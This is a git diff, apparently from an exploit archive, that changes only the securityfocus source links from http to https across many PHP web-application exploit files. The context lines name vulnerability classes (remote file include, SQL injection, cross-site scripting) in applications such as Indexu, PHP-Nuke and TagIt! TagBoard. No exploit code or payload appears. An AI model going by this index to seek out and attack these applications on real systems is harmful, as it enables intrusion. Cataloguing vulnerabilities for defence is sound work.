a/exploits/php/webapps/29426.txt +++ b/exploits/php/webapps/29426.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29427.txt b/exploits/php/webapps/29427.txt index b3a5ae67d..1455ad8d9 100644 --- a/exploits/php/webapps/29427.txt +++ b/exploits/php/webapps/29427.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29428.txt b/exploits/php/webapps/29428.txt index 45b050a04..b1ba6fc8e 100644 --- a/exploits/php/webapps/29428.txt +++ b/exploits/php/webapps/29428.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29429.txt b/exploits/php/webapps/29429.txt index 5fa3ed46d..7e860dbd4 100644 --- a/exploits/php/webapps/29429.txt +++ b/exploits/php/webapps/29429.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29430.txt b/exploits/php/webapps/29430.txt index 536bd1fab..be7223795 100644 --- a/exploits/php/webapps/29430.txt +++ b/exploits/php/webapps/29430.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29431.txt b/exploits/php/webapps/29431.txt index 982ff3ab7..ef3f64da2 100644 --- a/exploits/php/webapps/29431.txt +++ b/exploits/php/webapps/29431.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29432.txt b/exploits/php/webapps/29432.txt index 327a2bfbc..bf804ff61 100644 --- a/exploits/php/webapps/29432.txt +++ b/exploits/php/webapps/29432.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29433.txt b/exploits/php/webapps/29433.txt index f0f877b75..243d9322d 100644 --- a/exploits/php/webapps/29433.txt +++ b/exploits/php/webapps/29433.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29434.txt b/exploits/php/webapps/29434.txt index c1c62a367..ed078d08c 100644 --- a/exploits/php/webapps/29434.txt +++ b/exploits/php/webapps/29434.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21965/info +source: https://www.securityfocus.com/bid/21965/info Magic Photo Storage Website is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29437.txt b/exploits/php/webapps/29437.txt index ed7010e75..0c547f762 100644 --- a/exploits/php/webapps/29437.txt +++ b/exploits/php/webapps/29437.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21967/info +source: https://www.securityfocus.com/bid/21967/info Easy Banner Pro is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29438.txt b/exploits/php/webapps/29438.txt index d64acfd4c..41a823b76 100644 --- a/exploits/php/webapps/29438.txt +++ b/exploits/php/webapps/29438.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/21974/info +source: https://www.securityfocus.com/bid/21974/info Edit-x is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29442.html b/exploits/php/webapps/29442.html index 9cfb176be..dac716dd3 100644 --- a/exploits/php/webapps/29442.html +++ b/exploits/php/webapps/29442.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22001/info +source: https://www.securityfocus.com/bid/22001/info phpBB is prone to an HTML-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/29450.txt b/exploits/php/webapps/29450.txt index ba9f8e5d8..e22089d7a 100644 --- a/exploits/php/webapps/29450.txt +++ b/exploits/php/webapps/29450.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22029/info +source: https://www.securityfocus.com/bid/22029/info Ezboxx is prone to multiple input-validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input. The vulnerabilities include an SQL-injection issue, multiple cross-site scripting issues, and a path-disclosure issue. diff --git a/exploits/php/webapps/29451.txt b/exploits/php/webapps/29451.txt index e6a5dd920..2b606ad40 100644 --- a/exploits/php/webapps/29451.txt +++ b/exploits/php/webapps/29451.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22032/info +source: https://www.securityfocus.com/bid/22032/info All In One Control Panel is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/29453.php b/exploits/php/webapps/29453.php index b3950d7b1..0c5f2c648 100644 --- a/exploits/php/webapps/29453.php +++ b/exploits/php/webapps/29453.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22037/info +source: https://www.securityfocus.com/bid/22037/info PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. diff --git a/exploits/php/webapps/29464.txt b/exploits/php/webapps/29464.txt index f83087009..b626045ef 100644 --- a/exploits/php/webapps/29464.txt +++ b/exploits/php/webapps/29464.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22068/info +source: https://www.securityfocus.com/bid/22068/info The 'liens_dynamiques' program is prone to a vulnerability that lets attackers bypass security restrictions. diff --git a/exploits/php/webapps/29466.txt b/exploits/php/webapps/29466.txt index d202e447c..befe305ec 100644 --- a/exploits/php/webapps/29466.txt +++ b/exploits/php/webapps/29466.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22070/info +source: https://www.securityfocus.com/bid/22070/info The 'liens_dynamiques' program is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29468.txt b/exploits/php/webapps/29468.txt index 9709c104d..3abdba161 100644 --- a/exploits/php/webapps/29468.txt +++ b/exploits/php/webapps/29468.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22072/info +source: https://www.securityfocus.com/bid/22072/info Jax Petitionbook is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29469.txt b/exploits/php/webapps/29469.txt index 2d8cb4468..c7a776e01 100644 --- a/exploits/php/webapps/29469.txt +++ b/exploits/php/webapps/29469.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22072/info +source: https://www.securityfocus.com/bid/22072/info Jax Petitionbook is prone to multiple local file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29472.txt b/exploits/php/webapps/29472.txt index 230455e9a..63025c8f4 100644 --- a/exploits/php/webapps/29472.txt +++ b/exploits/php/webapps/29472.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22078/info +source: https://www.securityfocus.com/bid/22078/info The 'dt_guestbook' program is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29474.txt b/exploits/php/webapps/29474.txt index bdf2685b0..ad50ba478 100644 --- a/exploits/php/webapps/29474.txt +++ b/exploits/php/webapps/29474.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22081/info +source: https://www.securityfocus.com/bid/22081/info SmE File Mailer is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/29477.txt b/exploits/php/webapps/29477.txt index 9b675f49b..b8e19d6a3 100644 --- a/exploits/php/webapps/29477.txt +++ b/exploits/php/webapps/29477.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22084/info +source: https://www.securityfocus.com/bid/22084/info Indexu is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29478.txt b/exploits/php/webapps/29478.txt index 342bae3e6..d8e61e27c 100644 --- a/exploits/php/webapps/29478.txt +++ b/exploits/php/webapps/29478.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22084/info +source: https://www.securityfocus.com/bid/22084/info Indexu is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29479.txt b/exploits/php/webapps/29479.txt index c574e00a5..3a9bd80de 100644 --- a/exploits/php/webapps/29479.txt +++ b/exploits/php/webapps/29479.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22084/info +source: https://www.securityfocus.com/bid/22084/info Indexu is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29480.txt b/exploits/php/webapps/29480.txt index ac53e73a7..c54644abf 100644 --- a/exploits/php/webapps/29480.txt +++ b/exploits/php/webapps/29480.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22084/info +source: https://www.securityfocus.com/bid/22084/info Indexu is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29481.txt b/exploits/php/webapps/29481.txt index bba068f4e..c2b4fd20d 100644 --- a/exploits/php/webapps/29481.txt +++ b/exploits/php/webapps/29481.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22084/info +source: https://www.securityfocus.com/bid/22084/info Indexu is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29483.txt b/exploits/php/webapps/29483.txt index 27fcd5e1a..02e30a315 100644 --- a/exploits/php/webapps/29483.txt +++ b/exploits/php/webapps/29483.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22084/info +source: https://www.securityfocus.com/bid/22084/info Indexu is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29484.txt b/exploits/php/webapps/29484.txt index 10cfbdf15..71e07c634 100644 --- a/exploits/php/webapps/29484.txt +++ b/exploits/php/webapps/29484.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22084/info +source: https://www.securityfocus.com/bid/22084/info Indexu is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29485.txt b/exploits/php/webapps/29485.txt index 234e54954..d15c2da1b 100644 --- a/exploits/php/webapps/29485.txt +++ b/exploits/php/webapps/29485.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22084/info +source: https://www.securityfocus.com/bid/22084/info Indexu is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29486.txt b/exploits/php/webapps/29486.txt index 0a07959aa..b95d472b7 100644 --- a/exploits/php/webapps/29486.txt +++ b/exploits/php/webapps/29486.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22084/info +source: https://www.securityfocus.com/bid/22084/info Indexu is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29487.txt b/exploits/php/webapps/29487.txt index 9c67a30a2..fd463f9da 100644 --- a/exploits/php/webapps/29487.txt +++ b/exploits/php/webapps/29487.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22084/info +source: https://www.securityfocus.com/bid/22084/info Indexu is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29488.txt b/exploits/php/webapps/29488.txt index 565c78c0d..c405d92de 100644 --- a/exploits/php/webapps/29488.txt +++ b/exploits/php/webapps/29488.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22084/info +source: https://www.securityfocus.com/bid/22084/info Indexu is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29489.txt b/exploits/php/webapps/29489.txt index 5428d015f..84f9b29f2 100644 --- a/exploits/php/webapps/29489.txt +++ b/exploits/php/webapps/29489.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22084/info +source: https://www.securityfocus.com/bid/22084/info Indexu is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29491.txt b/exploits/php/webapps/29491.txt index 235fb5120..e6df3ba3a 100644 --- a/exploits/php/webapps/29491.txt +++ b/exploits/php/webapps/29491.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22097/info +source: https://www.securityfocus.com/bid/22097/info MyBloggie is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29492.txt b/exploits/php/webapps/29492.txt index 6e06c6203..3463922e5 100644 --- a/exploits/php/webapps/29492.txt +++ b/exploits/php/webapps/29492.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22097/info +source: https://www.securityfocus.com/bid/22097/info MyBloggie is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29497.txt b/exploits/php/webapps/29497.txt index 67b325fbc..76c6f3a35 100644 --- a/exploits/php/webapps/29497.txt +++ b/exploits/php/webapps/29497.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22141/info +source: https://www.securityfocus.com/bid/22141/info Easebay Resources Paypal Subscription Manager is prone to multiple input-validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input. The vulnerabilities include an SQL-injection issue and a cross-site scripting issue. diff --git a/exploits/php/webapps/29498.txt b/exploits/php/webapps/29498.txt index 6b243b3e6..b3d14141b 100644 --- a/exploits/php/webapps/29498.txt +++ b/exploits/php/webapps/29498.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22142/info +source: https://www.securityfocus.com/bid/22142/info Easebay Resources Login Manager is prone to multiple input-validation vulnerabilities because the application fails to sufficiently sanitize user-supplied input. The vulnerabilities include an SQL-injection issue and a cross-site scripting issue. diff --git a/exploits/php/webapps/29499.txt b/exploits/php/webapps/29499.txt index ca7d2534f..2dd001515 100644 --- a/exploits/php/webapps/29499.txt +++ b/exploits/php/webapps/29499.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22143/info +source: https://www.securityfocus.com/bid/22143/info SMF is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/php/webapps/29504.txt b/exploits/php/webapps/29504.txt index 2bbd87878..30333bbfa 100644 --- a/exploits/php/webapps/29504.txt +++ b/exploits/php/webapps/29504.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22164/info +source: https://www.securityfocus.com/bid/22164/info Unique Ads is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/29505.txt b/exploits/php/webapps/29505.txt index d4137c18b..79fa6bd22 100644 --- a/exploits/php/webapps/29505.txt +++ b/exploits/php/webapps/29505.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22167/info +source: https://www.securityfocus.com/bid/22167/info 212cafeBoard is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29506.txt b/exploits/php/webapps/29506.txt index 64f9e9896..1586f3be7 100644 --- a/exploits/php/webapps/29506.txt +++ b/exploits/php/webapps/29506.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22169/info +source: https://www.securityfocus.com/bid/22169/info Bitweaver is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29507.txt b/exploits/php/webapps/29507.txt index f263800a8..a23ca04e0 100644 --- a/exploits/php/webapps/29507.txt +++ b/exploits/php/webapps/29507.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22173/info +source: https://www.securityfocus.com/bid/22173/info 212Cafe Guestbook is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29508.sh b/exploits/php/webapps/29508.sh index 7b26e501d..9adac2bcd 100755 --- a/exploits/php/webapps/29508.sh +++ b/exploits/php/webapps/29508.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22191/info +source: https://www.securityfocus.com/bid/22191/info Multiple VoIP phones using the Aredfox PA168 Chipset are prone to a session-hijacking vulnerability due to a design error. diff --git a/exploits/php/webapps/29521.txt b/exploits/php/webapps/29521.txt index a9dbf80b3..23367f65e 100644 --- a/exploits/php/webapps/29521.txt +++ b/exploits/php/webapps/29521.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22218/info +source: https://www.securityfocus.com/bid/22218/info Virtual Host Administrator is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29522.py b/exploits/php/webapps/29522.py index 19c235134..fa9522e6b 100755 --- a/exploits/php/webapps/29522.py +++ b/exploits/php/webapps/29522.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22220/info +source: https://www.securityfocus.com/bid/22220/info WordPress is prone to a denial-of-service vulnerability and an information-disclosure vulnerability. diff --git a/exploits/php/webapps/29529.txt b/exploits/php/webapps/29529.txt index b57d04333..051ad5b1a 100644 --- a/exploits/php/webapps/29529.txt +++ b/exploits/php/webapps/29529.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22263/info +source: https://www.securityfocus.com/bid/22263/info PHP Membership Manager is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29530.txt b/exploits/php/webapps/29530.txt index 939e51fa3..3609fe89a 100644 --- a/exploits/php/webapps/29530.txt +++ b/exploits/php/webapps/29530.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22265/info +source: https://www.securityfocus.com/bid/22265/info FD Script is prone to an information-disclosure vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29534.txt b/exploits/php/webapps/29534.txt index 797a13045..a6ac9e840 100644 --- a/exploits/php/webapps/29534.txt +++ b/exploits/php/webapps/29534.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22282/info +source: https://www.securityfocus.com/bid/22282/info Vivvo Article Management CMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/29537.txt b/exploits/php/webapps/29537.txt index 083e31dba..5f745b6f0 100644 --- a/exploits/php/webapps/29537.txt +++ b/exploits/php/webapps/29537.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22293/info +source: https://www.securityfocus.com/bid/22293/info MDPro is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query. diff --git a/exploits/php/webapps/29539.txt b/exploits/php/webapps/29539.txt index ae6367415..477db3436 100644 --- a/exploits/php/webapps/29539.txt +++ b/exploits/php/webapps/29539.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22319/info +source: https://www.securityfocus.com/bid/22319/info EncapsCMS is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29556.txt b/exploits/php/webapps/29556.txt index 8cd5fa3f9..a1c6780cc 100644 --- a/exploits/php/webapps/29556.txt +++ b/exploits/php/webapps/29556.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22346/info +source: https://www.securityfocus.com/bid/22346/info OpenEMR is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29557.txt b/exploits/php/webapps/29557.txt index 2ed3e5316..005cae008 100644 --- a/exploits/php/webapps/29557.txt +++ b/exploits/php/webapps/29557.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22348/info +source: https://www.securityfocus.com/bid/22348/info OpenEMR is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29559.txt b/exploits/php/webapps/29559.txt index bcb9fe84f..8a8eb3a84 100644 --- a/exploits/php/webapps/29559.txt +++ b/exploits/php/webapps/29559.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22369/info +source: https://www.securityfocus.com/bid/22369/info EasyMoblog is prone to multiple input-validation vulnerabilities, including SQL-injection issues and a cross-site scripting issue, because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29560.txt b/exploits/php/webapps/29560.txt index 31e9bd2b4..a91c1ceb9 100644 --- a/exploits/php/webapps/29560.txt +++ b/exploits/php/webapps/29560.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22374/info +source: https://www.securityfocus.com/bid/22374/info PHPProbid is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29561.txt b/exploits/php/webapps/29561.txt index 14df29757..ff9365112 100644 --- a/exploits/php/webapps/29561.txt +++ b/exploits/php/webapps/29561.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22375/info +source: https://www.securityfocus.com/bid/22375/info Uebimiau is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29562.txt b/exploits/php/webapps/29562.txt index 01c211eb8..02b82250f 100644 --- a/exploits/php/webapps/29562.txt +++ b/exploits/php/webapps/29562.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22381/info +source: https://www.securityfocus.com/bid/22381/info PortailPHP is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29563.txt b/exploits/php/webapps/29563.txt index 909d465ac..1bd0eac73 100644 --- a/exploits/php/webapps/29563.txt +++ b/exploits/php/webapps/29563.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22381/info +source: https://www.securityfocus.com/bid/22381/info PortailPHP is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29564.txt b/exploits/php/webapps/29564.txt index bc6d49b9c..4fd05afe8 100644 --- a/exploits/php/webapps/29564.txt +++ b/exploits/php/webapps/29564.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22381/info +source: https://www.securityfocus.com/bid/22381/info PortailPHP is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29565.txt b/exploits/php/webapps/29565.txt index 5dca924a5..2ec6649ff 100644 --- a/exploits/php/webapps/29565.txt +++ b/exploits/php/webapps/29565.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22381/info +source: https://www.securityfocus.com/bid/22381/info PortailPHP is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29566.txt b/exploits/php/webapps/29566.txt index a8ce31a08..4d4a4ca93 100644 --- a/exploits/php/webapps/29566.txt +++ b/exploits/php/webapps/29566.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22381/info +source: https://www.securityfocus.com/bid/22381/info PortailPHP is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29568.txt b/exploits/php/webapps/29568.txt index 13a33cf88..4e21ed627 100644 --- a/exploits/php/webapps/29568.txt +++ b/exploits/php/webapps/29568.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22409/info +source: https://www.securityfocus.com/bid/22409/info Coppermine Photo Gallery is prone to multiple remote and local file-include vulnerabilities because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29569.txt b/exploits/php/webapps/29569.txt index 0ff88f417..abb4444db 100644 --- a/exploits/php/webapps/29569.txt +++ b/exploits/php/webapps/29569.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22431/info +source: https://www.securityfocus.com/bid/22431/info MySQLNewsEngine is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29571.txt b/exploits/php/webapps/29571.txt index 21f9af612..17755cb1c 100644 --- a/exploits/php/webapps/29571.txt +++ b/exploits/php/webapps/29571.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22453/info +source: https://www.securityfocus.com/bid/22453/info SysCP is prone to an arbitrary code-execution vulnerability. diff --git a/exploits/php/webapps/29572.txt b/exploits/php/webapps/29572.txt index c3df79ab2..a120f469e 100644 --- a/exploits/php/webapps/29572.txt +++ b/exploits/php/webapps/29572.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22474/info +source: https://www.securityfocus.com/bid/22474/info cPanel is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/29574.php b/exploits/php/webapps/29574.php index 8881ed282..cb153d589 100644 --- a/exploits/php/webapps/29574.php +++ b/exploits/php/webapps/29574.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22498/info +source: https://www.securityfocus.com/bid/22498/info eXtreme File Hosting is prone to an arbitrary file-upload vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/php/webapps/29578.txt b/exploits/php/webapps/29578.txt index bd4451715..1d03ca355 100644 --- a/exploits/php/webapps/29578.txt +++ b/exploits/php/webapps/29578.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22518/info +source: https://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29579.txt b/exploits/php/webapps/29579.txt index 4944b7acf..cabbde462 100644 --- a/exploits/php/webapps/29579.txt +++ b/exploits/php/webapps/29579.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22518/info +source: https://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29580.txt b/exploits/php/webapps/29580.txt index 0fe4ceac8..19006a167 100644 --- a/exploits/php/webapps/29580.txt +++ b/exploits/php/webapps/29580.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22518/info +source: https://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29581.txt b/exploits/php/webapps/29581.txt index 6a6cab402..a74cf39f8 100644 --- a/exploits/php/webapps/29581.txt +++ b/exploits/php/webapps/29581.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22518/info +source: https://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29582.txt b/exploits/php/webapps/29582.txt index b9b94d593..66873269a 100644 --- a/exploits/php/webapps/29582.txt +++ b/exploits/php/webapps/29582.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22518/info +source: https://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29583.txt b/exploits/php/webapps/29583.txt index 2616a418a..ed17636dd 100644 --- a/exploits/php/webapps/29583.txt +++ b/exploits/php/webapps/29583.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22518/info +source: https://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29584.txt b/exploits/php/webapps/29584.txt index a806ecc22..8876ae517 100644 --- a/exploits/php/webapps/29584.txt +++ b/exploits/php/webapps/29584.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22518/info +source: https://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29585.txt b/exploits/php/webapps/29585.txt index 6b843dd82..7475c7a26 100644 --- a/exploits/php/webapps/29585.txt +++ b/exploits/php/webapps/29585.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22518/info +source: https://www.securityfocus.com/bid/22518/info TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/php/webapps/29586.txt b/exploits/php/webapps/29586.txt index f8a0aeb0a..0d1db4b3f 100644 --- a/exploits/php/webapps/29586.txt +++ b/exploits/php/webapps/29586.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/22518/info +source: https://www.securityfocus.com/bid/22518/info TagIt! 